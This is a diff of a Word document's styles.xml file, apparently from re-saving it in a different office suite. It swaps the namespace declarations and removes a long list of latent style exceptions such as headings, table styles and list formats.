-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main" xmlns:wpsCustomData="http://www.wps.cn/officeDocument/2013/wpsCustomData" mc:Ignorable="w14">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
-        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        <w:lang w:val="en-NG" w:eastAsia="en-NG" w:bidi="ar-SA"/>
+        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
       </w:rPr>
     </w:rPrDefault>
     <w:pPrDefault/>
   </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
-    <w:lsdException w:name="Normal" w:uiPriority="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:semiHidden="1" w:uiPriority="9" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="index 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index 9" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 1" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 2" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 3" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 4" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 5" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 6" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 7" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 8" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toc 9" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footer" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="index heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="caption" w:semiHidden="1" w:uiPriority="35" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="table of figures" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="envelope return" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="footnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="line number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="page number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote reference" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="endnote text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="table of authorities" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="macro" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="toa heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Bullet 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Number 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Title" w:uiPriority="10" w:qFormat="1"/>
-    <w:lsdException w:name="Closing" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1" w:uiPriority="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="List Continue 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Message Header" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Subtitle" w:uiPriority="11" w:qFormat="1"/>
-    <w:lsdException w:name="Salutation" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Date" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text First Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Note Heading" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Body Text Indent 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Block Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="FollowedHyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:uiPriority="20" w:qFormat="1"/>
-    <w:lsdException w:name="Document Map" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Plain Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="E-mail Signature" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Acronym" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Address" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Cite" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Code" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Definition" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Keyboard" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Preformatted" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Sample" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Typewriter" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="HTML Variable" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="annotation subject" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="No List" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Balloon Text" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Table Grid" w:uiPriority="39"/>
-    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Placeholder Text" w:semiHidden="1"/>
-    <w:lsdException w:name="No Spacing" w:uiPriority="1" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
